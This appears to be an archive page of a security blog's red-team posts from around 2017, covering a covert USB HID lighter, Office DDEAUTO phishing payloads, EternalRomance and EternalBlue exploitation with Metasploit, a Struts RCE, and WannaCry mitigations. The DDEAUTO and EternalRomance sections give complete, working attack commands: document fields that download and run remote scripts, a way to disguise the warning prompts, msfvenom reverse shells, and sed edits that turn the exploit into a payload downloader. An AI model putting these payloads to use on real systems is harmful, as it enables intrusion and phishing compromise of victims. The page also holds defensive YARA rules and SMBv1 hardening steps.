Covert Lighter HID Attack Tool

  By | | , ,
Leave a comment

On Twitter about a month ago @jermainlaforce had an awesome idea of hiding a USB HID device inside a lighter case, using one of those cheap Chinese spycams you can find on ::ebay:: for $5. HID attack tools are nothing new, here’s a video of one I made in 2011 using a Teensy board (Turn down your volume)

All you need to do is open the top of the case and gut the insides, then replace the hardware with a USB (WHID, Ducky, Digispark, Teensy etc..). I also ended up ordering one because I figured I’d recycle the camera guts for another upcoming red team engagement I have coming up to monitor a dropbox location. The process is fairly simple and straight forward to build this out.

I decided to use a Digispark board because you can also get cheap knockoff ones on ::ebay:: too for like $1.50, I have a bunch of these laying around from various projects and it’s cheap, the whole project cost about $6.50. The camera button ended up broken during shipping so i ended up just ripping it all apart by yanking the USB metal to pull out the guts from the case. (it had a dab of some glue to hold it tight)

I then de-soldered the USB connector from the camera board to reuse on the Digispark board since it has one of those on-board USB connectors

I then soldered it to the Digispark going 1to1 with the pins to the board

Replaced the top portion that holds it to the case, and added some hotglue to keep it from wiggling around inside

Slide everything back together and you’re golden.

Depending on which dev board you used I have some example payloads on my ::github:: to get you started with some attack ideas.

Telephreak Tactical Lunchbox

  By | | ,
Leave a comment


One of the cooler swag I received @ Defcon this year was a lunchbox for the Telephreak party, filled with candy, gadgets, and toys from telephreakbadge. I do some ‘red teaming’ occasionally and always had my stuff all janky in my backpack with no way to really keep it all pretty and was a pain in the ass to go through everything to find what tools I needed. Plus stuffing them all in a box tends to get shit broken eventually. I was thinking I needed something like a pelican box but I didnt feel like spending a huge amount on something simple. So I was thinking one day that this lunchbox sitting on my desk would do the trick. I ended up getting a few pieces of Polyethylene off ebay for $9, They arrived pretty quick and i spent about an hour or so arranging some of my most used tools onto each layer and cutting out the foam to fit them all in. I used a small knife (the ones that have a knife/scissor/toothpick) and a razor blade to cut out the foam. Here’s all 3 layers that fit inside with descriptions of each tool’s usage.

Layer 1

with an acrylic case, highly customizable USB attack platform (HID,Network Etc…)

Layer 2

  • Hak5 WIFI Pineapple – various wifi attack tools
  • Firefighter Swipe Tool – open doors
  • DigiSpark DigiStump attiny85 dev board – cheap rubber ducky alternative that you dont have to worry about losing
  • Hook Tool – open some door latch bolts

Layer 3

as a bonus my Asus Nexus 7 loaded with Kali Nethunter also fits inside

skiptracer

  By | |
Leave a comment

My new open source python OSINT framework, skiptracer was released @ HushCon East on June 1st. Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Using some basic python webscraping of PII paywall sites to compile passive information on a target. The modules will allow queries for phone/email/screen names/real names/addresses/IP/Hostname/breach credentials etc.. It will help you collect relevant information about a target to help expand your attack surface.`Everyone should be encourage to submit new ideas/modules. You can get the code here: https://github.com/xillwillx/skiptracer feel free to submit new modules or code fixes.

Office DDEAUTO attacks

  By | | , ,
1 Comment

Sensepost posted 10 days ago about a vulnerability which can trigger command execution, without use of macros, when someone opens a specially crafted Office document. Although a little bit of social-engineering needs to come in play for the victim to click ‘yes’ to the first 2 of 3 message boxes, most end-users are easily tricked. They found that by abusing the parameters of the DDEAUTO function that they could use powershell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987, which establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program, (new information becomes available in a linked document, a DDE field inserts new information when you update the field). SensePost discovered that instead of specifying an application like Excel, an attacker can specify arbitrary parameters of another application as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although Sensepost just demonstrated this using Word, they left other ideas up to the reader. There has been other ways being thrown around on Twitter over the past week, on a bunch of ways to accomplish code execution in Word, Excel, and even Rich-Text based Outlook emails. I’ll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open new word document, press CTRL+F9 key, and paste this between the {} brackets then save the file
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

Also I’ve seen in the wild that you can you can obfuscate the messagebox contents furthering your social-engineering attempts to trick the user into clicking yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although powershell webdl scripts are easier to do you might want to have your payload all in one document so its not calling out for your binary over the network. Dave Kennedy updated his Unicorn python script to generate a msfvenom meterpreter payload that gets base64 encode/decoded when the DDEAUTO is triggered. Dave recently updated some fixes I sent to him along with the way obfuscate the messageboxes.
Open a console in Kali

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt

Paste your cat'd payload into Word and save it, then to send to your target. Then in a new console window open your metereter handler to recieve some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* if you need your external IP change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message, the only caveat on Outlook 2013/2016 being that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open new word document, press CTRL+F9 key, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

In the body of the message copy and paste any image into the body.

From your Word Document copy your DDEAuto payload, then paste that into the body of the email. Enter the recipient etc and send. You'll get the DDE messages, just say no to them. When your recipient receives the email, it wont trigger until they press reply. If they press yes to the first 2 messageboxes then it'll execute your payload.

Calendar Invites:
Another attacker vector would be recurring Calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft files. Although the underlying parsing using Word triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist hack that will help disable DDEAUTO in the registry, although it does break some things in OneNote.

Nviso made some YARA rules to detect DDE also

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
  
rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}
  
rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}
 
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
 
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a

Exploiting with EternalRomance using Metasploit installed inside Win10 WSL

  By | | , ,
Leave a comment

This post will have a few sections. We will get some general information of the ETERNALROMANCE exploit, learn how to install WSL on Win10 Creators Update, along with Metasploit. As a bonus I will show how to do this on Kali, and show a few different additional tricks to download payloads to the target machine.

The original ETERNALROMANCE is a remote code execution (RCE) exploit targeting legacy SMBv1 that came from a leak on April 14, 2017, by a group calling themselves the Shadow Brokers. It was part weaponized exploit collection attributed to NSA and Equation Group called Lost_In_Translation, which targeted Windows XP/Vista/7 and Windows Server 2003/2008. It takes advantage of CVE-2017-0145, which has been patched by the MS17-010 security bulletin. File sharing over SMB is normally used only within local networks, if an attacker has access to a vulnerable endpoint running SMB the can gain SYSTEM privileges. ETERNALROMANCE takes advantage of a bug in access to named pipes, more in depth information can be found here.

The original exploit required that you generate shellcode using DoublePulsar which was also in the dump. There has been a few posts demonstrating this when the it first hit the net. But, being limited to their shellcode, and if you tried to use other shellcode the exploit would blue screen the target machine. Also you were not able to exploit any newer machines above Server 2008.

We will be using some updated python code from sleepya that fixes some issues (BSOD) with the original code of ETERNALROMANCE’s and allows compatibility to exploit Windows 2000/XP/Vista/7/8.1/2008 R2/2012 R2/2016 R2.
ETERNALROMANCE requires authentication, either through a Guest account, if it’s enabled, otherwise, we would have to previously obtained a username and password from the target machine. For this demonstration we will assume the target machine has Guest enabled. *Even if it is a Guest account, the exploit gives us SYSTEM privileges.

To start off I am going to assume you already have the Creators Update installed on Windows 10 (which solves some issues on WSL with ping finally, but Nmap is still jacked up :/ ).

Installing WSL Ubuntu:

Turn on Developer Mode
Open Settings -> Update and Security -> For developers
Select the Developer Mode radio button

Open a command prompt. Run bash

Accept the license, the Ubuntu image will download and install.

Launch a new Ubuntu shell by running bash from a cmd or powershell prompt or by typing bash in the start menu and clicking it. Create a new user and password,
then run sudo apt-get update && sudo apt-get upgrade -y since the image will be behind. You should be ready to go to install Metasploit now.

Installing Metasploit:

Most of this info I borrowed from Darkoperator’s blog post since essentially it’s the same idea of installing Metasploit on Ubuntu. You want to disable Window Defender and also add an exclusion to %userprofile%\AppData\Local\lxss inside Windows Defender’s settings otherwise it might break the install of some of the payloads etc that are detected. In your bash window you’re going to paste all these commands and make sure you dont get any errors.

sudo add-apt-repository -y ppa:webupd8team/java
sudo apt-get update
sudo apt-get -y install oracle-java8-installer
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

Right about this time you’ll want to get some coffee or Monster because ruby is going to a long time to finish. Once finished it should post the version that installed. Now were going to skip a few steps like setting up postgresql and Nmap because we wont need a DB now and Nmap is not working currently in WSL. So lets move on to getting Metasploit installed.

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

So hopefully at this point you should have Metasploit installed. You can test it by typing msfconsolein the bash prompt.

Exploiting the Target
Now comes the easy part, I’ll give you some easy commands you can type in 3 different bash windows. Open the windows one at a time , the Metasploit handler will take a bit to startup, so you can open a second window and create a msfvenom payload, which will also take a little bit to finish creating and encoding. Once both of those are finished, open a 3rd bash window and paste the commands, it should download the EternalRomance python and smb.py to help exploit our target and should automagically change your IP and our new download payload using sed to replace the default stuff. I chose to use certutil to download our msfvenom meterpreter payload from our python SimpleHTTpServer and then execute it.

With your open msconsole window test our target IP first to see if it’s exploitable:
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

if your target machine is exploitable then continue with the next step of opening the 3 bash windows. you can also choose to use any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc… when using EternalRomance.py in window 3 (i chose ‘netlogon’) also dont forget to change the to your target’s IP.


Bash Window #1 – MetaSploit Handler
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

Bash Window #2 – Created msfvenom payload and started python webserver
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -e shikata_ga_nai -i 3 -f exe > 1.exe
sudo python -m SimpleHTTPServer 80

Bash Window #3 – Download EternalRomance, edit it, & exploit victim
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c certutil -urlcache -split -f http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

python EternalRomance.py [TargetIP] netlogon


If all goes well you should see a new meterpreter session open from your target. 🙂

Kali VM EternalRomance exploiting info:

It will be just about the same and the information above except few a different commands…

#1. – Test Target IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

*choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…

#2 – Create Metasploit Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. – Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315-O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py
Credits for this regsvr32 payload idea:Sheila Berta / Casey Smith / CroweCybersecurity
#5. – Start Webserver
service apache2 start

##################################
# Exploit it(change the TargetIP and named pipe if you want)
python EternalRomance.py [TargetIP] netlogon

If all goes well a shell shall rain down on ya.
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

If I missed anything or something needs correcting hit me up on Twitter.

Equihax

  By | | , ,
Leave a comment


In July, CVE-2017-9805, was reserved for the Apache Struts RCE vulnerability in the REST plugin. Apache Struts 2.5 through 2.5.12 that are using REST plugin are vulnerable to this attack. It had an initial disclosure on 7/17/2017, and a patch was released recently on 9/5/2017, with Apache updating Struts to version 2.5.13 was released. The flaw exists in using the Struts REST plugin with XStream handler to handle XML payloads. If exploited correctly, it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it. The problem occurs in XStreamHandler’s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object. lgtm has in in depth article along with a press release from Apache Foundation. The company Lgtm, who discovered the CVE-2017-9805 vulnerability, had warned that at least 65 percent of Fortune 100 companies use Struts, and they could all be exposed to remote attacks due to this vulnerability.

Equifax, one of the “big-three” U.S. credit bureaus was most likely, and unfortunately, not watching the bleeding-edge of security to prevent their server from being compromised. When they discovered the “unauthorized access” on July 29, they called in the security team from Mandiant to help them figure out the fallout of having potentially 143 million people’s PII released to the hackers. They released a video on September 7th, urging people to sign up on equifaxsecurity2017.com, which it itself was a shitshow, along with it being a poorly coded site, it was also flagged as a phishing site and didn’t even seem to be looking up the data correctly, with people using false info and still getting the same response from the site as a real account would. I’d be weary to submit my information to that site, along with some reports that the wording in the site gives them a loophole on you not being able to be part of a class action lawsuit if that ever comes to fruition.
. Below is a video from the CEO of Equifax about the incident.


Rick Smith, Chairman and CEO of Equifax Inc., on cybersecurity incident involving consumer information. Equifax has established a dedicated website, www.equifaxsecurity2017.com, to help consumers determine if their information has been potentially impacted and to sign up for credit file monitoring and identity theft protection.

There’s been speculation that this Struts vulnerability is how Equifax were owned. Looking into how the exploit can be recreated shows how easy it is for an attacker to take control of a server. The team from Metasploit created a module to trigger the CVE-2017-9805 vulnerability that was released shortly after its disclosure.

For those who would like to try this out at home in your ‘test’ lab, you can quickly test this out against your test server on a linux box, like using the Kali distro.
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rbcp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/ run msfconsole and load the module by running
use exploit/multi/http/struts2_rest_xstreamshow options

Someone also anonymously released this gist on github the same day showing how you can simply exploit Struts.

Mazin Ahmed released some python code on his github that allows you to check for a vuln server or list of servers easily
Checking if the vulnerability exists against a single URL.python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploiting a single URL.python struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/struts-pwn'

So make sure you patch your server if you’re running Struts, if you dont have a webserver running Struts, then all you have to do is worry about your Identity being stolen if you’re an American.
Sign up for credit monitoring if you can, and then freeze your credit files at the major credit bureaus. Information for how to file a freeze is available here.

CVE-2017-0213 – Windows COM EoP

  By | | , , ,
Leave a comment

Wrote another blog post for Milton Security about details of a vulnerability that James Forshaw of Google Project Zero found in January, that exploits a bug in Windows COM Aggregate Marshaler. An attacker can use this bug to elevate privileges on Windows machines.

Microsoft had 90 days to patch, which they have with last month’s security updates. The post includes a proof of concept code for 32 and 64 bit versions of Windows from Win7-10 and Server 2k8-2k16.
https://www.miltonsecurity.com/company/blog/cve-2017-0213-windows-com-privilege-escalation-vulnerability

EternalRed – CVE-2017-7494

  By | | , ,
Leave a comment

I wrote another post for the Milton Security blog on the CVE-2017-7494 Samba exploit, which affects Linux machines running Samba 3.5.0 – 4.5.4/4.5.10/4.4.14. This also includes NAS devices that many people do not patch regularly. In the blog post i talked about what Samba is and how it has been vulnerable for the last 7 years due to this bug. I also go over on how to test/ exploit your machine to see if you’re vulnerable. I also cover some mitigations, the maintainers of the Samba project have provided a patch so I would advise you install it as soon as possible, some NAS firmware upgrades have been available from Netgear and Synology already.

Below is a demonstration of how easy it is to gain access on a vulnerable machine.

Exploiting CVE-2017-7494 with is_known_pipename Metasploit module

CVE-2017-0199 exploiting and preventing – guest blog

  By | |
Leave a comment

Phishing scams tricking unsuspecting users into opening nefarious files are nothing new, and attackers have using weaponized documents for just about as long. This week, I had the pleasure of being featured on Milton Security’s blog to talk about a new attack that was spotted as early as last year, and was finally patched by Microsoft in April. I went over this CVE-2017-0199 vulnerability that affected Windows based machines using Microsoft Word and the default built-in Wordpad, that enabled an attacker to send a malicious RTF file that would execute a HTA file remotely without any user interaction besides opening the file. I went over how to create the file using Metasploit, a python script, and finally just using Microsoft Word itself and editing the file to make it autorun. Spear-phishing attacks could allow the attacker to send these files to their victims over a spoofed in email and gain a foothold into the victim’s network if they weren’t properly patched which the article also covered towards the end on how to mitigate. So head over there and check it out. https://www.miltonsecurity.com/company/blog/analysis-cve-2017-0199-ms-word-threats-are-back

M17-010 EternalBlue

  By | | , ,
Leave a comment

A few weeks ago ShadowBrokers released a dump of NSA/EquationGroup tools used to exploit various machines that they previously tried to auction off unsuccessfully. One of the exploits was for Windows SMB RCE which allowed an unauthenticated attacker to gain System-level privileges on target machines remotely by sending a specially crafted packet to a targeted SMB server. Microsoft quietly patched this as MS17-010 a month before, in March, before the dump was even made public. Although the dump was supposedly stolen around 2013, this affected Windows machines from Win2k up to Win2k16. Most reliable targets were Win7 and Win2k8 R2.


One exploit was codenamed EternalBlue. Everyone quickly jumped on the tools and found that along with ExternalBlue there was another tool called DoublePulsar that allowed you to inject shellcode or DLLs into the victim target after they were exploited with EternalBlue, it sets up the APC call with some user mode shellcode that would perform the DLL load avoiding use of the standard LoadLibrary call. DOUBLEPULSAR implements a loader that can load almost any DLL. A few people had writeups [1] & [2] on how to successfully install the tools in Windows and on Wine on Linux using older versions of Python. It was also discovered you could replace the DoublePulsar .dll with something like Meterpreter or Empire to have more control over your target with the need to use the NSA-provided GUI tool called FuzzBunch.

One could simply use Metasploit to create a .dll using:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.153 LPORT=9898 -f dll -o meterpreter.dll
msfconsole -x "use exploit/multi/handler;set LHOST 192.168.2.153;set LPORT 9898;\
set PAYLOAD windows/x64/meterpreter/reverse_tcp;set ExitOnSession false;exploit -j"
This will create a .dll and open a reverse handler, then you would only need to copy or point to the dll from your attacking machine to use.

@JennaMagius and @zerosum0x0 from RiskSense took a different approach to the tool by replaying network activity of the the attack using a Python script, they were able to eliminate the need to use older versions of Python and needing to do without going through the EternalBlue/DoublePulsar scripts and you are now able to load a Meterpreter payload automatically to the victim with only passing the IP and the path to your Meterpreter payload as parameters. https://github.com/RiskSense-Ops/MS17-010/tree/master/exploits/eternalblue
On Kali create your own bin payload (edit to your own IP & port):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=9898 -f raw -o test.bin
then with python 3.6.1 on Windows or Linux run:
C:\MS17-010-master\exploits\eternalblue>python eternalblue.py 192.168.1.129 test.bin

They’ve concluded that there is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD.So far they’ve gotten Win2k8 R2 to trigger the exploit reliably and are continuing to work on different Windows versions and architecture.

UPDATE:
They have just released a Metasploit module that targets Win7 and Win2k8 x64 ::HERE::

UPDATE 2:
A ransomware worm called WCRY or WannaCry using the same codebase has been spreading over the past few days using the same scanning technique and infection. It’s been hitting thousands of unpatched machines all over the world, UK hospitals, Telefonica, FedEx, and other businesses were hit by attack.

When it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that has been copied from DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.
It encrypts a computer’s files and demands a $300 Bitcoin ransom before unlocking it. Not only does it encrypt your files it continues to scan for other PCs to infect within the network and to PCs outside the network.

I created a simple tool that prevents the worm from encrypting your files and spreading itself by creating a MUTEX named ‘Global\MsWinZonesCacheCounterMutexA’, that the worm uses to check to see if it already infected the target, thus it exits its code. Get it from https://github.com/xillwillx/WCRY-Ransomeware-Mutex. This prevents the original variant of the worm, no guarantee that someones going to modify this name in future variants.

Other preventions you can do to stop from getting infected from EternalBlue/DoublePulsar is just run any of these commands in an Elevated Command Prompt on your machine dism /online /norestart /disable-feature /featurename:SMB1Protocol or sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled
from Elevated Powershell Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
To remove SMB v1 in Windows 8.1, Windows 10, Windows 2012 R2, and Windows Server 2016 use elevated Powershell:
Remove-WindowsFeature FS-SMB1 or Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
Note You must restart the computer after you make these changes. Since most networks do not need a legacy protocol like SMBv1, it shouldn’t break anything important.

And as always, update your machines, there’s been patches available for for 2 months and an out of the ordinary patch for unsupported WinXP/Vista/2k3/2k8 that was released. http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598. Also consider adding a rule on your router or firewall to block incoming SMB traffic on port 445